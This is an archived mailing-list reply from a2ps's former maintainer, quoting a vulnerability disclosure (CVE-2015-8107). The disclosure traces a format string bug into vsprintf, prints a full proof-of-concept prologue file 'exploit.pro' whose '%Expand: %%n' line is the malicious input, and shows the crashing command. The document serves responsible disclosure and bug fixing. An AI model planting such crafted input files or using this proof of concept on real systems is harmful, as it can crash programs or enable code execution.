[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: Format string bug report in a2ps
From: |
Masayuki Hatta |
Subject: |
Re: Format string bug report in a2ps |
Date: |
Wed, 18 Nov 2015 10:38:10 +0900 |
Hi,
I'm the former maintainer of a2ps. Thank you for reporting!
I'm not sure about the current maintainership, but if nobody does, I
can prepare the new interim release which fixes this bug.
Best regards,
MH
2015-11-12 14:40 GMT+09:00 김종권 <address@hidden>:
> Dear Gnu-a2ps team,
>
> I am writing this to report a format string vulnerability in a2ps. (4.14,
> which is the latest version)
> Also I already have been assigned a CVE identifier from MITRE
> "CVE-2015-8107", so I want to make public this vulnerability.
>
> - Target Platform
> Linux
> - Target Version
> 4.14 (Latest Version)
>
> - Vulnerability description
> When user runs a2ps with malicious crafted pro(a2ps prologue) file, an
> attacker can execute arbitrary code.
> The function output_file processes the %Expand command in pro file.
> The variable `expansion' in the function output_file may hold a malicious
> input string, which can be used as a format argument of vsprintf.
>
> -- Step 1. (ouput.c 524 line)
>
> 524 expansion = ((char *)
> expand_user_string (job, FIRST_FILE (job),
> (const uchar *) "Expand: requirement",
> (const uchar *) token));
>
> For instance, the variable expansion will point to the string “%n” when a
> text line "%Expand: %%\n” exists in an input pro file.
>
> -- Step 2. (output.c 525 line)
>
> 525 output (dest, expansion);
>
> output() is called in line 525, and the argument `expansion' is used as a
> format string, which can be malicious, as we described in step 1.
>
> -- Step 3. (output.c 873 line)
> 182 void output (struct output * out, const char *format, ...){
> ...
> 202 ds_unsafe_cat_vsprintf (out->chunk,format, args);
> ...
>
> The variable format, which can be malicious, can be passed to
> ds_unsafe_cat_vsprintf() in line 202.
>
> -- step 4. (dstring.c 321 line)
> 321 void ds_unsafe_cat_vsprintf (struct dstring * ds, const char *format,
> va_list args){
> ...
> 326 vsprintf (ds->content + ds->len, format, args);
> ...
>
> The value of format, which can be malicious, is used as an argument of
> vsprintf in line 326, therefore arbitrary code can be executed.
>
> -- Step 4. Our malicious input
> "exploit.pro"
> ===================================
> % -*-postscript-*-
> % PostScript Prologue
> %
> % $Id: matrix.pro,v 1.1.1.1.2.1 2007/12/29 01:58:27 mhatta Exp $
> %
>
> %
> % This file is part of a2ps.
> %
> % This program is free software; you can redistribute it and/or modify
> % it under the terms of the GNU General Public License as published by
> % the Free Software Foundation; either version 3, or (at your option)
> % any later version.
> %
> % This program is distributed in the hope that it will be useful,
> % but WITHOUT ANY WARRANTY; without even the implied warranty of
> % MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
> % GNU General Public License for more details.
> %
> % You should have received a copy of the GNU General Public License
> % along with this program; see the file COPYING. If not, write to
> % the Free Software Foundation, 59 Temple Place - Suite 330,
> % Boston, MA 02111-1307, USA.
> %
> Documentation
> The layout is the same as samp(bw)samp, but alternating gray and white
> lines.
> There are two macros defining the behavior:
> samp(pro.matrix.cycle)samp defines the length of the cycle (number of white
> and gray lines). It defaults to 6.
> samp(pro.matrix.gray)samp defines the number of gray lines. Default is 3.
> EndDocumentation
> % -- code follows this line --
> %%IncludeResource: file base.ps
> %%IncludeResource: file a2ps.hdr
> %%BeginResource: procset a2ps-matrix-Prolog 2.0 1
>
> % Function T(ab), jumps to the n-th tabulation in the current line
> /T {
> cw mul x0 add y0 moveto
> } bind def
>
> % Function n: move to the next line
> /n { %def
> /y0 y0 bfs sub store
> % Draw a grey background
> /nline nline 1 add def
> % @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
> % @@@@@@@@@@@@@@ Malicious user input @@@@@@@@@@@@@@@
> %Expand: %%n
> % @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
>
> %Expand: nline #{pro.matrix.cycle:-6} mod #{pro.matrix.gray:-3} ge {
> gsave
> newpath
> x v get y0 currentfont /Descent get currentfontsize mul add moveto
> pw 0 rlineto
> 0 bfs rlineto
> pw neg 0 rlineto
> closepath
> 0.9 setgray
> fill
> grestore
> } if
> x0 y0 moveto
> } bind def
>
> % Function N: show and move to the next line
> /N {
> Show
> n
> } bind def
>
> /S {
> Show
> } bind def
>
> /p {
> false UL
> false BX
> %Face: Plain Courier bfs
> Show
> } bind def
>
> /sy {
> false UL
> false BX
> %Face: Symbol Symbol bfs
> Show
> } bind def
>
> /k {
> false UL
> false BX
> %Face: Keyword Courier-Oblique bfs
> Show
> } bind def
>
> /K {
> false UL
> false BX
> %Face: Keyword_strong Courier-Bold bfs
> Show
> } bind def
>
> /c {
> false UL
> false BX
> %Face: Comment Courier-Oblique bfs
> Show
> } bind def
>
> /C {
> false UL
> false BX
> %Face: Comment_strong Courier-BoldOblique bfs
> Show
> } bind def
>
> /l {
> false UL
> false BX
> %Face: Label Helvetica bfs
> Show
> } bind def
>
> /L {
> false UL
> false BX
> %Face: Label_strong Helvetica-Bold bfs
> Show
> } bind def
>
> /str{
> false UL
> false BX
> %Face: String Times-Roman bfs
> Show
> } bind def
>
> /e{
> false UL
> true BX
> %Face: Error Helvetica-Bold bfs
> Show
> } bind def
>
> %%EndResource
> %%BeginSetup
> % The font for line numbering
> /f# /Helvetica findfont bfs .6 mul scalefont def
> /nline 0 def
> %%EndSetup
> ===================================
>
> Execute
> ===================================
> ~ $ a2ps --version
> GNU a2ps 4.14
> Written by Akim Demaille, Miguel Santana.
>
> Copyright (c) 1988-1993 Miguel Santana
> Copyright (c) 1995-2000 Akim Demaille, Miguel Santana
> Copyright (c) 2007- Akim Demaille, Miguel Santana and Masayuki Hatta
> This is free software; see the source for copying conditions. There is NO
> warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
>
> ~ $ a2ps --prologue=exploit test.tex -o test.ps
> aborted (core dumped)
> ===================================
>
> - How we found the vulnerability
>
> We used a static analyzer, Sparrow[1], to find the format string bug. Our
> analyzer reported an alarm in a2ps dstring.c 326 line, So we looked for a
> a2ps source code and found the bug.
>
> Sparrow is a state-of-the-art static analyzer that aims to verify the
> absence of fatal bugs in C source. Sparrow is designed by Abstract
> Interpretation and the analysis is sound in design. Sparrow adopts a number
> of well-founded static analysis techniques[2,3] for scalability, precision,
> and user convenience.
>
> References
> [1]: http://ropas.snu.ac.kr/sparrow/
> [2]: Selective Context-Sensitivity Guided by Impact Pre-Analysis. Hakjoo Oh,
> Wonchan Lee, Kihong Heo, Hongseok Yang, and Kwangkeun Yi. PLDI'14.
> [3]: Design and Implementation of Sparse Global Analyses for C-like
> Languages. Hakjoo Oh, Kihong Heo, Wonchan Lee, Woosuk Lee, and Kwangkeun Yi.
> PLDI'12
>
> Sincerely, Woosuk Lee & Jong-Gwon Kim
>
> -----------------------------
> Woosuk Lee
> Ph.D. candidate
> ROPAS lab. (http://ropas.snu.ac.kr/)
> ROSAEC center (http://rosaec.snu.ac.kr/)
> Seoul National University
> (tel) +82-2-880-1865
> (email) address@hidden
> -----------------------------
> -----------------------------
> Jong-Gwon Kim
> Graduate student
> ROPAS lab. (http://ropas.snu.ac.kr/)
> ROSAEC center (http://rosaec.snu.ac.kr/)
> Seoul National University
> (tel) +82-2-880-1865
> (email) address@hidden
> -----------------------------
--
Masayuki Hatta
Assistant Professor, Faculty of Economics and Management, Surugadai
University, Japan
http://about.me/mhatta
address@hidden / address@hidden / address@hidden /
address@hidden